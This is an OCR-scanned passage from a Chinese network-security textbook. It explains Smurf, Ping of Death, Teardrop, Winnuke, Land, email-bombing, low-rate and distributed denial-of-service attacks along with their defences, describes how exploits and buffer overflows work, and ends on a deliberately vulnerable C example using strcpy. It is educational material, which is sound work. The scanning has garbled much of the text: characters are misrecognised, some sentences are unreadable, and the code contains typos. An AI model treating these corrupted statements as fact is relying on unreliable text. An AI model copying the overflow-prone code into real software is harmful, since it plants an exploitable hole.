个 原理 来 进行 的 ， 当 然 还 需要 一 个 假冒 的 源 地 址 。 也 就 是 说 ， 在 网 络 中 发 送 源 地 址 为 要 
攻击 主机 的 地 址 、 目 的 地 址 为 广播 地 址 的 包 ， 会 使 许多 系统 响应 发 送 大 量 的 信息 给 被 攻 
击 主机 《因为 其 地 址 被 攻击 者 假冒 了 )。 


3. 网 络 上 各 个 主机 
都 收 到 ICMP 广 播 


目标 5 目标 主机 受到 
大 量 ICMP 包 攻 4. 网 络 上 各 个 主机 
都 向 目的 主机 回 


应 ICMP 包 


(图 中 实 线 部 分 表示 攻击 者 发 出 的 ICMP 包 ， 虚 线 部 分 表示 对 目的 攻击 的 ICMP 包 ) 
图 3-37 Smurf 攻击 示意 图 


对 于 被 攻击 者 利用 的 “无 率 ” 中 间 网 络 和 被 攻击 的 目标 ， 无 论 它们 的 内 部 网 络 还 是 
与 因特网 的 连接 ，Smurf 攻击 都 会 使 网 络 性 能 受到 影响 ， 严 重 时 这 个 网 络 都 无 法 使 用 。 
而 且 ， 为 这 些 网 络 提供 服务 的 中 小 ISP 也 会 因此 降低 其 网 络 效率 和 服务 质量 。 对 于 大 型 
ISP 而 言 ， 其 骨干 网 可 能 出 现 饱和 现象 而 部 分 影响 其 服务 质量 。 

对 付 Smurf 攻击 可 以 从 三 个 方面 采取 措施 : 

(1) 被 攻击 者 利用 进行 攻击 的 中 间 网 络 应 采取 的 措施 

配置 路 由 器 禁止 人 P 广播 包 进 网 。 几 乎 在 所 有 的 情况 下 ， 这 种 功能 是 不 必要 的 。 应 该 
在 网 络 的 所 有 路 由 器 上 都 禁止 这 个 功能 ， 而 不 仅仅 在 与 外 部 网 络 连接 的 路 由 器 上 禁止 。 
例如 ， 网 络 上 有 5 个 路 由 器 连接 着 10 个 LAN， 则 应 该 在 这 5 个 路 由 器 上 都 禁止 卫 广播 
包 通 过 。 

配置 网 络 上 所 有 计算 机 的 操作 系统 ， 禁 止 对 目标 地 址 为 广播 地 址 的 ICMP 包 响 应 。 
虽然 对 路 由 器 进行 了 禁止 网 外 ICMP 广播 包 的 进入 ， 但 是 攻击 者 可 能 已 经 攻破 了 网 络 内 
部 的 某 台 主 机 ， 攻 击 者 仍然 可 以 使 用 网 络 上 这 人 台 被 他 控制 的 主机 发 起 Smurf 攻击 。 

(2) 被 攻击 的 目标 应 采取 的 措施 
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对 被 攻击 的 目标 而 言 ， 要 防止 接收 到 大 量 的 ICMPECHOREPLY 包 的 攻击 没有 一 个 
简单 的 解决 办 法 。 虽 然 可 以 对 被 攻击 网 络 的 路 由 器 进行 配置 ， 禁 止 ICMPECHOREPLY 
包 进 入 , 但 这 并 不 能 阻止 网 络 路 由 器 到 其 ISP 之 间 的 网 络 拥塞 。 较为 稳妥 的 方法 是 与 ISP 
协商 ， 由 ISP 暂时 阻止 这 些 流 量 。 另 外 ， 被 攻击 目标 应 及 时 与 被 攻击 者 利用 而 发 起 攻击 
的 中 间 网 络 的 管理 员 联系 。 

(3) 攻击 者 攻击 实际 发 起 的 网 络 应 采取 的 措施 

对 于 从 本 网 络 向 外 部 网 络 发 送 的 数据 包 ， 本 网 络 应 该 将 其 源 地 址 为 其 他 网 络 的 这 部 
分 数据 包 过 滤 掉 。 虽然 目前 的 技术 还 不 可 能 消除 伪造 也 地 址 的 数据 包 , 但 使 用 过 滤 技 术 
可 以 减少 这 种 伪造 发 生 的 可 能 。 

3. 利用 处 理 程序 错误 的 拒绝 服务 攻击 

这 种 攻击 方法 主要 是 利用 TCP/IP 协议 实现 中 的 处 理 程序 错误 实施 拒绝 服务 攻击 ， 
即 故 意 错 误 的 设 定数 据 包头 的 一 些 重要 字段 (如 王 包 头 部 的 TotalLength, Fragmentoffset, 
IHL 和 Sourceaddress 等 )， 使 用 RawSocket 将 这 些 错 误 的 IP 数据 包 发 送出 去 。 在 接收 数 
据 端 ， 服 务 程序 通常 都 存在 一 些 问题 ， 因 而 在 将 接收 到 的 数据 包 组 装 成 一 个 完整 的 数据 
包 的 过 程 中 ， 就 会 引起 系统 死机 、 挂 起 或 崩溃， 无 法 继续 提供 服务 。 这 些 攻击 包括 
PingofDeath 攻击 、Teardrop 攻击 、Winnuke 攻击 ， 以 及 Land 攻击 等 。 

(1) PingofDeath 攻击 

根据 TCP/IP 协议 的 规范 ， 一 个 包 的 长 度 最 大 为 65536 字 节 。 尽 管 一 个 包 的 长 度 最 
大 不 能 超过 65536 字 节 ， 但 是 一 个 包 分 成 的 多 个 片段 的 全 加 却 能 做 到 。 当 一 个 主机 收 到 
了 长 度 大 于 65536 字 节 的 包 时 ， 就 是 受到 了 PingofDeath 攻击 ， 该 攻击 会 造成 主机 死机 。 
攻击 者 故意 创建 一 个 长 度 大 于 65536 字 节 (IP 协议 中 规定 最 大 的 王 包 长 为 65536 字 节 ) 
的 ping 包 , 并 将 该 包 发 送 到 目标 受害 主机 , 由 于 目标 主机 的 服务 程序 无 法 处 理 过 大 的 包 ， 
而 引起 系统 崩溃 、 挂 起 或 重启 。 如 图 3-38 所 示 。 


SK P 报 文 长 度 
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图 3-38 PingofDeath 攻击 报 文 


由 于 在 早期 阶段 ， 路 由 器 对 所 传输 的 数据 包 的 最 大 尺寸 都 有 限制 ， 许 多 操作 系统 对 
TCP/IP 的 实现 在 ICMP 包 上 都 是 规定 64KB， 并 且 在 对 包 的 标题 头 进行 读 取 之 后 ， 要 根 
据 该 标题 头 里 包含 的 信息 来 为 有 效 载 荷 生成 缓冲 区 ， 一 旦 产生 畸形 即 声明 自己 的 尺寸 超 
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过 ICMP 上 限 的 包 ， 也 就 是 加 载 的 尺寸 超过 64KB 上 限时 ， 就 会 出 现 内 存 分 配 错误 ， 导 
致 TCP/IP 堆栈 月 溃 ， 致 使 接收 方 死 机 。 这 种 攻击 方式 主要 是 针对 Windows 操作 系统 ， 
而 Unix, Linux, Solaris, MacOS 都 具有 抵抗 一 般 PingofDeath 攻击 的 能 力 。 目 前 ， 所 有 
的 操作 系统 都 对 此 进行 了 修补 或 升级 。 

(2) Teardrop 攻击 

一 个 四 分 组 在 网 络 中 传播 的 时 候 ， 由 于 沿途 各 个 链 路 的 最 大 传输 单元 不 同 , 路 由 器 
WEAN P 包 进行 分 组 ， 即 将 一 个 包 分 成 一 些 片段 ， 使 每 段 都 足够 小 ， 以 便 通 过 这 个 狭 
窒 的 链 路 。 每 个 片段 将 具有 完整 的 耳 包头 ， 其 大 部 分 内 容 和 最 初 的 包头 相同 ， 一 个 很 典 
型 的 不 同 在 于 包头 中 还 包含 偏 移 量 (offset) 字段 。 随 后 各 片段 将 沿 着 各 自 的 路 径 独 立 的 
转发 到 目的 地 ， 在 目的 地 最 终 将 各 片段 进行 重组 。 这 就 是 所 谓 的 他 包 的 分 段 /重组 技术 。 

Teardrop 攻击 就 是 利用 IP 包 的 分 段 /重组 技术 在 系统 实现 中 的 一 个 错误 ， 即 在 组 装 
卫 包 时 只 检查 了 每 段 数据 是 否 过 长 ， 而 没有 检查 包 中 有 效 数 据 的 长 度 是 否 过 小 。 当 包 中 
数据 长 度 为 负 时 ， 由 于 memepy O 中 的 计数 器 是 一 个 反 码 ， 负 数 表 示 一 个 非常 大 的 数 
值 。 因 为 全 包 重组 和 缓冲 区 通常 处 于 系统 核心 态 , 缓冲 区 溢出 将 使 系统 崩溃 。 攻击 者 可 
以 通过 发 送 两 段 (或 者 更 多 ) 数据 包 来 实现 Teardrop 攻击 。 实 现 攻击 的 数据 包 中 ， 第 一 
个 包 的 偏 移 量 为 0, KEAN, 第 二 个 包 的 偏 移 量 小 于 N。 为 了 合并 这 些 数据 段 ，TCP/IP 
堆栈 会 分 配 超 乎 寻常 的 巨大 资源 ， 从 而 造成 系统 资源 的 缺乏 ， 甚 至 机 器 重新 启动 。 

(3) Winnuke 攻击 

Winnuke 攻击 针对 Windows 系统 上 一 般 都 开放 的 139 端口 ， 这 个 端口 由 NetBIOS 
使 用 。 只 要 往 该 端口 发 送 1 字 节 TCPOOB 数据 ， 就 可 以 使 Windows 系统 出 现 “蓝屏 ” 
错误 ， 并 且 网 络 功 能 完全 瘫痪 。 除 非 重 新 启动 ， 否 则 不 能 再 用 。 

带 外 数据 OOB (OutofBand) 是 指 TCP 连接 中 发 送 的 一 种 特殊 数据 ， 它 的 优先 级 高 
于 一 般 的 数据 ， 带 外 数据 在 报头 中 设置 了 URG 标志 ， 可 以 不 按照 通常 的 次 序 进入 TCP 
缓冲 区 ， 而 是 进入 另外 一 个 缓冲 区 ， 可 立即 被 进程 读 取 ; 或 者 可 以 根据 进程 的 设置 ， 直 
接 用 SIGURG 信号 通知 进程 有 带 外 数据 到 来 。 

(4) Land 攻击 

Land 也 是 一 个 十 分 有 效 的 攻击 工具 , 它 对 当前 流行 的 大 部 分 操作 系统 及 一 部 分 路 由 
器 都 具有 相当 的 攻击 能 力 。 攻 击 者 利用 目标 受害 系统 的 自身 资源 实现 攻击 意图 。 由 于 目 
标 受 害 系 统 具 有 漏洞 和 通信 协议 的 弱点 ， 这 样 就 给 攻击 者 提供 了 攻击 的 机 会 。 攻 击 者 将 
一 个 包 的 源 地 址 和 目的 地 址 都 设置 为 目标 主机 的 地 址 , 然后 将 该 包 通 过 人 P 欺骗 的 方式 发 
送 给 被 攻击 主机 ， 这 种 包 可 以 造成 被 攻击 主机 因 试 图 与 自己 建立 连接 而 陷入 死 循 环 ， 从 
而 很 大 程度 地 降低 了 系统 性 能 。 

在 Land 攻击 中 ，SYN 包 中 的 源 地 址 和 目标 地 址 都 被 设置 成 某 一 个 服务 器 地 址 ， 这 
时 将 导致 接受 服务 器 向 它 自己 的 地 址 发 送 SYN 十 ACK 消息 ， 结 果 这 个 地 址 又 发 回 ACK 
消息 并 创建 一 个 空 连接 ， 每 一 个 这 样 的 连接 都 将 保留 直到 超时 。 对 Land 攻击 反应 不 同 ， 
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许多 UNIX SEAL AA, mi Windows 会 变 的 极其 缓慢 。 

对 于 这 些 利用 TCP/IP 协议 实现 中 的 处 理 程序 错误 实施 的 攻击 ， 最 有 效 最 直接 的 防 
御 方 法 是 尽早 发 现 潜 在 的 错误 并 及 时 修正 。 从 长 远 角度 考虑 ， 在 编制 软件 的 时 候 应 更 多 
地 考虑 安全 问题 ， 提 高 代码 质量 ， 减 少 安全 漏洞 。 
3.3.4.4 ETHER 

电子 邮件 龙 炸 是 最 早 的 一 种 拒绝 服务 攻击 ， 它 的 表现 形式 是 在 很 短 时 间 内 收 到 大 量 
无 用 的 电子 邮件 。 因为 所 有 的 邮件 都 需要 空间 来 保存 ,同时 收 到 的 邮件 需要 系统 来 处 理 。 
过 多 的 邮件 会 加 剧 网 络 连接 负担 、 消 耗 大 量 的 存储 空间 ， 过 多 的 投递 会 导致 系统 日 志文 
件 变 得 巨大 ， 甚 至 溢出 文件 系统 ， 这 将 给 许多 操作 系统 (如 UNIX 和 Windows) 带 来 危 
险 。 而 且 ， 大 量 到 来 的 邮件 将 消耗 大 量 的 处 理 器 时 间 ， 占 用 大 量 的 带宽 ， 延 缓 甚至 阻止 
系统 的 正常 处 理 活动 。 这 都 影响 了 正常 业务 的 运行 ， 严 重 时 使 系统 死机 、 网 络 瘫痪 。 

电子 邮件 龙 炸 实质 上 也 是 一 种 针对 服务 端口 CSMTP 端口 , 即 25 端口 ) 的 攻击 方式 ， 
它 的 原理 是 ;连接 到 邮件 服务 器 的 SMTP (25) 端口 ， 按 照 SMTP 协议 发 送 几 行头 信息 
加 上 一 堆 文 字 垃圾 ， 就 算 只 发 送 了 一 封 邮件 ， 反 复 多 次 ， 就 形成 了 邮件 炸弹 。 在 这 种 攻 
击 中 ， 攻 击 者 需要 谨慎 的 是 隐藏 自己 的 踪迹 ， 也 就 是 隐藏 自己 的 IP. 

KaBoom! 是 一 种 较为 典型 的 邮件 炸弹 程序 ， 它 实现 了 一 种 所 谓 邮件 列表 炸弹 。 邮 
件 列 表 是 一 种 用 电子 邮件 实现 的 论坛 ， 列 表 本 身 有 一 个 电子 邮件 地 址 。 向 该 列表 对 应 的 
电子 邮件 地 址 发 送 电子 邮件 时 ， 所 有 加 入 该 列表 的 用 户 都 会 收 到 这 封 邮件 。 这 样 ， 不 需 
要 依靠 攻击 程序 发 送 邮件 炸弹 ， 这 些 邮 件 列 表 会 代替 攻击 程序 做 这 件 事 。 这 种 攻击 有 两 
个 特点 : 一 是 做 到 了 真正 的 匿名 ， 发 送 邮件 的 是 邮件 列表 ;其 二 是 难以 避免 这 种 攻击 ， 
除非 被 攻击 者 更 换 电子 邮件 地 址 ， 或 者 向 邮件 列表 申请 退出 。 此 外 ， 有 一 类 计算 机 病毒 
通过 病毒 传播 的 方法 发 送 电子 邮件 炸弹 。 

对 付 电 子 邮 件 龙 炸 的 办 法 不 是 很 多 ， 可 以 识别 邮件 炸弹 的 源头 ， 配 置 路 由 器 ， 不 使 
其 通过 。 可 以 配置 防火 墙 ， 但 防火 墙 最 多 只 能 防止 从 攻击 者 源头 发 来 的 信息 。 另 外 需要 
保证 防火 墙 能 使 外 头 的 SMTP 连接 只 能 到 达 指 定 服务 器 ， 而 不 能 影响 其 他 系统 。 当 然 ， 
这 并 不 能 防止 攻击 ， 只 是 减少 龙 炸 对 其 他 系统 的 影响 。 使 用 最 新 版 本 的 电子 邮件 服务 软 
件 , 提高 系统 记 账 能 力 , 有 利于 对 发 生 的 事件 进行 追踪 。 由 于 电子 邮件 龙 炸 不 一 定 是 100% 
的 匿名 行动 ， 因 此 可 能 根据 头 信息 来 跟踪 发 出 地 。 但 如 果 攻 击 者 真 的 要 攻击 的 话 ， 就 会 
远程 登录 到 SMTP 端口 ， 然 后 直接 发 出 SMTP 命令 ， 如 果 主 机 正在 运行 ， 入 侵 可 能 会 遇 
到 障碍 ， 不 过 入 侵 者 可 以 冒充 他 人 ， 因 此 也 会 得 偿 。 
3.3.4.5 ”低速 率 拒绝 服务 攻击 CLow-rateDoS) LDoS 

1. 低速 率 拒绝 服务 攻击 原理 

LDoS 攻击 与 传统 的 洪 泛 式 DoS 攻击 截然 不 同 ， 其 最 大 特点 是 不 需要 维持 高 速率 攻 
击 流 ， 耗 尽 受害 者 端 所 有 可 用 资源 ， 而 是 利用 网 络 协议 或 应 用 服务 中 常见 的 自 适 应 机 制 
CA, TCP 的 拥塞 控制 机 制 ) 中 所 存在 的 安全 漏洞 ， 通 过 周期 性 地 在 一 个 特定 的 短暂 时 
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间 间 隔 内 突 发 性 地 发 送 大 量 攻击 数据 包 ， 从 而 降低 被 攻击 端 服务 性 能 。LDoS 攻击 只 是 
在 特定 时 间 间 隔 内 发 送 数据 ， 相 同 周 期 其 他 时 间 段 内 不 发 送 任何 数据 ， 此 间 鞭 性 攻击 特 
点 ， 使 得 攻击 流 的 平均 速率 比较 低 ， 与 合法 用 户 的 数据 流 区 别 不 大 ， 不 再 具有 上 述 异 常 
统计 特性 ， 使 得 很 难 用 已 有 的 方法 对 其 进行 防范 。 可 以 认为 LDoS 攻击 是 对 传统 Dos 攻 
击 的 改进 形式 ， 它 与 传统 DoS 攻击 相 比 ， 更 加 彻底 地 做 到 了 有 的 放 矢 ， 因 此 攻击 效率 有 
了 大 幅度 的 提高 ， 且 更 加 有 效 地 躲避 了 检测 和 防范 。LDoS 攻击 的 提出 给 攻击 防范 问题 
的 研究 带 来 了 新 的 挑战 。 

2. 现 有 的 LDos 攻击 防范 方法 

自 LDoS 攻击 提出 以 来 ， 研 究 者 们 根据 此 类 攻击 原理 提出 了 许多 不 同 的 攻击 方式 ， 
对 于 其 检测 和 过 滤 防 范 方法 也 做 了 一 些 研究 ， 主 要 有 以 下 几 种 防范 方法 。 

外 基于 协议 的 LDoS 攻击 防范 方法 。 此 类 方法 最 具 代 表 性 的 就 是 针对 Shrew 攻击 的 
随机 化 minRTO 方法 。Shrew 攻击 所 利用 的 一 个 关键 漏洞 就 是 端 系统 最 小 超时 等 待 时 间 
minRTO 存在 一 致 性 ， 正 是 minRTO 一 般 取 值 均 为 1s， 才 使 得 链 路 状态 恢复 过 程 具 有 固 
定 的 周期 性 特征 。Kuzmanovic 在 2003 年 提出 Shrew 攻击 的 同时 ， 就 提出 了 随机 化 端 系 
统 的 最 小 超时 等 待 时 间 minRTO 的 取 值 来 破坏 超时 重 传 的 周期 性 规律 ， 使 得 攻击 者 无 法 
准确 预测 TCP 端 下 一 次 发 送 数 据 的 时 间 ， 也 就 无 法 在 准确 的 时 刻 发 送 攻 击 数据 流 ， 从 而 
缓解 LDoS 攻击 的 影响 。 

@ 基 于 攻击 流 特征 检测 的 LDoS 攻击 防范 方法 。 此 类 方法 主要 分 为 基于 脉冲 高 速率 
特征 的 检测 方法 、 基 于 攻击 流 时 域 特征 的 检测 方法 以 及 基于 攻击 流 频 域 特征 的 检测 方法 
三 类 。 
3.3.4.6 ”分布 式 拒绝 服务 攻击 DDoS 

分 布 式 拒绝 服务 DDoS (DistributedDenialofService ) 攻击 是 对 传统 DoS 攻击 的 发 展 ， 
攻击 者 首先 侵入 并 控制 一 些 计 算 机 ， 然 后 控制 这 些 计 算 机 同时 向 一 个 特定 的 目标 发 起 拒 
绝 服 务 攻击 。 

传统 的 拒绝 服务 攻击 有 受 网 络 资源 的 限制 和 隐蔽 性 差 两 大 缺点 ， 而 分 布 式 拒绝 服务 
攻击 却 克 服 了 传统 拒绝 服务 攻击 的 这 两 个 致命 弱点 。 分 布 式 拒绝 服务 攻击 的 隐蔽 性 更 强 。 
通过 间接 操纵 网 络 上 的 计算 机 实施 攻击 ， 突 破 了 传统 攻击 方式 从 本 地 攻击 的 局 限 性 和 不 
安全 性 。 分 布 式 拒绝 服务 可 以 根据 情况 扩大 攻击 的 规模 ， 使 目标 系统 完全 失去 服务 的 功 
能 。 目 前 , DDoS 技术 发 展 十 分 迅速 , 由 于 其 隐蔽 性 和 分 布 性 很 难 被 识别 和 防御 。 被 DDoS 
攻击 时 可 能 的 现象 有 : 

@ 被 攻击 主机 上 有 大 量 等 待 的 TCP 连接 。 

© 大 量 到 达 的 数据 分 组 (包括 TCP 分 组 和 UDP 分 组 ) 并 不 是 网 站 服务 连接 的 一 部 
分 ， 往 往 指 向 机 器 的 任意 端口 。 

@ 网 络 中 充斥 着 大 量 的 无 用 的 数据 包 ， 源 地 址 为 假 。 

@ 制造 高 流量 的 无 用 数据 ， 造 成 网 络 拥塞 ， 使 受害 主机 无 法 正常 和 外 界 通 信 。 
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© 利用 受害 主机 提供 的 服务 和 传输 协议 上 的 缺陷 ， 反 复发 出 服务 请 求 ， 使 受害 3 
机 无 法 及 时 处 理 所 有 正常 请 求 。 

@ 严重 时 会 造成 死机 。 

DDoS 引入 了 分 布 式 攻击 和 Client/Server 结构 ， 使 DoS 的 威力 激增 。 同 时 ，DDoS 
圳 括 了 已 经 出 现 的 各 种 重要 的 DoS 攻击 方法 ， 比 DoS 的 危害 性 更 大 。 现 有 的 DDoS T 
具 一 般 采 用 三 级 结构 ， 如 图 3-39 所 示 ， 其 中 : Client (客户 端 ) 运行 在 攻击 者 的 主机 上 ， 
用 来 发 起 和 控制 DDoS 攻击 ; Handler (EPR) 运行 在 已 被 攻击 者 侵入 并 获得 控制 的 主 
机 上 ， 用 来 控制 代理 端 ，Agent (代理 端 ) 运行 在 已 被 攻击 者 侵入 并 获得 控制 的 主机 上 ， 
从 主 控 端 接收 命令 ， 负 责 对 目标 实施 实际 的 攻击 。 


mr 


a 


Agent Agent Agent Agent Agent Agent Agent Agent 
图 3-39 DDoS 的 三 级 控制 结构 


DDoS 要 获得 成 功 ,需要 进行 长 期 的 准备 工作 。 首 先 ， 攻击 者 寻找 在 Internet 上 有 漏 
洞 的 主机 ， 必 须 进 入 系统 后 在 其 上 面 安 装 后 门 程序 ， 侵 入 并 控制 分 布 在 世界 各 地 的 大 量 
主机 ， 在 这 些 主机 上 编译 安装 Handler 和 Agent， 使 它们 持续 地 活动 ， 这 一 步骤 称 为 “ 构 
造 攻击 网 络 ” 其 次 ， 攻 击 者 在 自己 的 机 器 上 操纵 客户 端 ， 将 控制 命令 发 往 各 个 主 控 端 ; 
最 后 再 由 主 控 端 间 接地 控制 代理 端 ， 发 起 DDoS 攻击 。 由 于 攻击 者 在 幕后 操纵 ， 所 以 在 
攻击 时 不 会 受到 监控 系统 的 跟踪 ， 身 份 不 容易 被 发 现 。 
目前 主要 的 DDoS 工具 有 Trinoo, TFN( TribeFloodingNetwork ), Staecheldraht, TFN2K 
(TribeFloodingNetwork2000)、Trinityv3 等 。 

对 付 上 述 DDoS 攻击 的 方法 主要 有 : 
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@ 在 数据 流 中 搜寻 特征 字符 串 。 攻 击 者 在 传达 攻击 命令 或 发 送 攻击 数据 时 ， 虽 然 
都 加 入 了 伪装 甚至 加 密 ， 但 是 其 数据 包 中 还 是 有 一 些 特征 字符 串 。 通 过 搜寻 这 些 特征 字 
符 串 ， 就 可 以 确定 攻击 服务 器 和 攻击 者 的 位 置 。 

@ 利用 攻击 数据 包 的 某 些 特征 。 攻 击 的 数据 包 一 般 有 某 些 特征 。 例 如 ， 超 长 或 畸 
形 的 ICMP 或 UDP 包 等 。 即使 数据 包 本 身 比 较 正 常 , 但 是 其 中 的 数据 比较 特异 , 例如 存 
在 某 种 加 密 特 性 时 ， 很 可 能 就 是 攻击 控制 器 向 攻击 机 发 布 的 攻击 命令 。 

© 设置 防火 墙 监视 本 地 主机 端口 的 使 用 情况 。 对 本 地 主机 中 的 敏感 端口 ， 如 
UDP31335、UDP27444、TCP27665， 进 行 监视 ， 如 果 发 现 这 些 端口 处 于 监听 状态 ， 则 系 
统 很 可 能 受到 攻击 。 即 使 攻击 者 已 经 对 端口 的 位 置 进行 了 一 定 的 修改 ， 但 如 果 外 部 主机 
主动 向 网 络 内 部 高 标号 端口 发 起 连接 请 求 ， 则 系统 也 很 可 能 受到 侵入 。 

@ 对 通信 数据 量 进行 统计 也 可 获得 有 关 攻 击 系统 的 位 置 和 数量 信息 。 例 如 ， 在 攻 
击 之 前 ， 目 标 网 络 的 域名 服务 器 往往 会 接收 到 远 远 超过 正常 数量 的 反 向 和 正 向 的 地 址 查 
询 。 在 攻击 时 ， 攻 击 数据 的 来 源 地 址 会 发 出 超出 正常 极限 的 数据 量 。 

© 了 ?P 首 向 追踪 。 在 当前 他 源 地 址 可 欺骗 的 情况 下 ， 准 确 、 快 速 追 踪 攻 击 源 是 防范 
网 络 攻 击 尤 其 是 DOS 攻击 的 关键 ， 通 过 IP 逆向 追踪 技术 就 近 封锁 攻击 流 或 采取 其 他 的 
制裁 措施 。 


3.3.5 ”漏洞 攻击 


漏洞 是 在 硬件 、 软 件 、 协 议 的 具体 实现 或 系统 安全 策略 上 存在 的 缺陷 ， 从 而 可 以 使 
攻击 者 能 够 在 未 授权 的 情况 下 访问 或 破坏 系统 。PoC 是 漏洞 的 触发 代码 。 在 网 络 安全 上 
来 说 ，PoC〔ProofofConcept， 攻 击 概念 证 明 ) 文件 ， 是 对 于 威胁 较 大 的 漏洞 来 说 的 ， 文 
件 内 包含 有 触发 漏洞 的 代码 或 信息 ,用 于 给 漏洞 产品 的 开发 人 员 参 考 并 做 出 相应 的 补丁 。 
3.3.5.1 exploit 

为 了 达到 发 现 网 站 的 漏洞 ， 实 现 获取 密码 档 、 添 加 用 户 、 控 制 网 站 的 目标 ， 攻 击 者 
会 进行 exploite exploit 字面 上 的 意思 是 “开拓 、 开 发 ” 而 在 破解 圈子 里 面 ， 公 认 的 概 
念 是 “漏洞 及 其 利用 ” 通俗 的 说 ，exploit 就 是 利用 一 切 可 以 利用 的 工具 、 采 用 一 切 可 
以 采用 的 方法 、 找 到 一 切 可 以 找到 的 漏洞 ， 并 且 通 过 对 漏洞 资料 的 分 析 研 究 ， 从 而 达到 
获取 网 站 用 户 资料 文档 、 添 加 自 定义 用 户 、 甚 至 侵入 网 站 获得 管理 员 权限 控制 整个 网 站 
的 最 终 目 的 。exploit 的 基本 过 程 如 下 : 

第 一 步 ， 对 目标 网 站 进行 扫描 。 可 以 用 已 知 的 漏洞 列表 进行 扫描 ， 查 看 目标 是 否 有 
漏洞 列表 中 的 漏洞 。 也 可 以 用 一 些 专门 的 软件 ， 扫 描 目 标的 其 他 相关 信息 ， 包 括 网 站 使 
用 的 操作 系统 版 本 、 提 供 的 服务 以 及 开放 的 端口 等 等 。 

第 二 步 ， 对 扫描 获得 的 信息 进行 分 析 研 究 ， 从 而 找 出 漏洞 所 在 以 及 利用 的 方法 。 

第 三 步 ， 选 用 相应 的 工具 ， 获 取 密 码 档 、 添 加 用 户 、 获 得 管理 员 权限 等 等 。 
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3.3.5.2 ”缓冲 区 溢出 攻击 

缓冲 区 溢出 攻击 是 一 种 通过 往 程 序 的 缓冲 区 写 超 出 其 长 度 的 内 容 ， 造 成 缓冲 区 溢 
出 ， 从 而 破坏 程序 的 堆栈 ， 使 程序 转 而 执行 其 他 预 设 指令 ， 以 达到 攻击 目的 的 攻击 方法 。 
缓冲 区 溢出 是 一 个 非常 普遍 、 非 常 严重 的 漏洞 ， 在 各 种 操作 系统 中 广泛 存在 。 

1. 缓冲 区 溢出 攻击 原理 

缓冲 区 是 计算 机 内 存 中 的 一 个 连续 块 ， 保 存 了 给 定 类 型 的 数据 。 当 进行 大 量 动态 内 
存 分 配 而 又 管理 不 当时 ， 就 会 出 现 问题 。 动 态 变量 所 需要 的 缓冲 区 ， 是 在 程序 运行 时 才 
进行 分 配 的 。 如 果 程 序 在 动态 分 配 的 缓冲 区 中 放 入 超 长 的 数据 ， 它 就 会 溢出 。 

打 个 比方 ， 缓 冲 区 溢出 好 比 是 将 十 磅 的 糖 放 进 一 个 只 能 装 五 磅 的 容器 里 。 一 旦 该 容 
器 放 满 了 ， 余 下 的 部 分 就 溢出 。 程 序 设 计 者 编写 的 程序 代码 ， 如 果 没 有 对 目的 区 域 即 组 
冲 区 做 适当 的 检查 ， 看 它们 是 否 够 大 ， 能 否 完全 装 入 新 的 内 容 ， 结 果 就 可 能 造成 缓冲 区 
溢出 。 但 是 ， 如 果 缓 冲 区 仅仅 只 是 溢出 ， 还 不 具有 破坏 性 。 当 糖 溢出 时 ， 柜 台 被 盖 住 。 
当 把 糖 擦 掉 或 用 吸尘器 吸 走 ， 就 可 以 恢复 柜台 本 来 的 面貌 。 与 此 不 同 的 是 ， 当 缓冲 区 溢 
出 时 ， 过 剩 的 信息 歼 盖 的 是 计算 机 内 存 中 以 前 的 内 容 ， 除 非 这 些 被 覆盖 的 内 容 被 保存 或 
能 够 恢复 ， 否 则 就 会 永远 丢失 。 在 丢失 的 信息 里 可 能 有 被 程序 调用 的 子 程序 及 其 参数 。 
这 意味 着 程序 不 能 得 到 足够 的 信息 从 子 程序 返回 ， 以 完成 它 的 任务 。 如 果 入 侵 者 用 精心 
编写 的 入 侵 代 码 〈 一 种 恶意 程序 ) 使 缓冲 区 溢出 ， 然 后 让 程序 依据 预 设 的 方法 处 理 缓冲 
区 ， 并 且 执 行 预 设 的 程序 代码 ， 此 时 的 程序 就 完全 被 入 侵 者 操纵 。 

缓冲 区 溢出 攻击 的 基本 原理 是 向 缓冲 区 中 写 入 超 长 的 、 预 设 的 内 容 ， 导 致 缓冲 区 洪 
出 ， 履 盖 其 他 正常 的 程序 或 数据 ， 然 后 让 计算 机 转 去 运行 这 行 预 设 的 程序 ， 达 到 执行 非 
法 操作 、 实 现 攻击 的 目的 。 

2. 缓冲 区 溢出 程序 的 原理 

众所周知 ，C 语言 不 进行 数组 的 边界 检查 。 在 许多 C 语言 实现 的 应 用 程序 中 ， 都 假 
定 缓冲 区 的 长 度 是 足够 的 ， 即 它 的 长 度 肯定 大 于 要 拷贝 的 字符 串 的 长 度 ， 事 实 上 却 并 非 
如 此 。 

通常 ， 一 个 程序 在 内 存 中 分 为 程序 段 、 数 据 段 和 堆栈 三 部 分 。 程 序 段 里 放 着 程序 的 
机 器 码 和 只 读数 据 ， 数 据 段 放 程序 中 的 静态 数据 ， 动 态 数据 则 通过 堆栈 来 存放 。 在 内 存 
中 ， 它 们 的 位 置 如 图 3-40 所 示 。 


内 存 低 端 


内 存 高 端 


图 3-40 一 个 程序 在 内 存 中 的 存放 
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堆栈 的 特性 是 后 进 先 出 (LIFO)， 即 先进 入 堆栈 的 对 象 最 后 出 来 ， 最 后 进入 堆栈 的 
对 象 最 先 出 来 。 堆栈 两 个 最 重要 的 操作 是 PUSH All POP. PUSH 将 对 象 放 入 堆栈 顶端 (最 
外 边 ， 内 存 高 端 ); POP 操作 实现 一 个 逆向 过 程 ， 把 顶端 的 对 象 取出 来 。 

一 般 来 讲 ， 当 发 生 程序 调用 时 ， 计 算 机 做 如 下 操作 : 

O 把 参数 压 入 堆栈 ， 即 将 参数 放 在 堆栈 最 里 端 〈 一 般 是 堆栈 的 高 地 址 端 )。 

© 把 指令 寄存 器 CIB) 中 的 内 容 压 入 堆栈 作为 返回 地 址 (RET)。 

@ 把 当前 ( 旧 ) 的 基 址 寄存 器 LB 压 入 堆栈 保存 ， 然 后 把 当前 的 堆栈 指针 CSP) 拷 
贝 到 LB， 作 为 新 的 基地 址 。 这 样 ， 程 序 可 以 通过 LB 这 个 值 读 (1) 中 压 入 的 参数 。 

© 为 本 地 变量 留 出 一 定 空间 ， 把 SP 减 去 适当 的 数值 。 

举 一 个 简单 的 例子 描述 上 述 过 程 : 

voidfunction (char*str) 

{ 

charbuffer [16]; 

strcpy (buffer, str); 

} 


voidmain () 

i 

intt; 

charbuffer[128]; 

for (i=0; i<127; i++) 
buffer [i]=’A’; 
buffer[127]=0; 

function (buffer); 
print (“Thisisatest\n”); 


} 


这 是 一 个 典型 的 存在 缓冲 区 溢出 错误 的 程序 。 在 函数 function0 中 , 将 一 个 128 字 节 
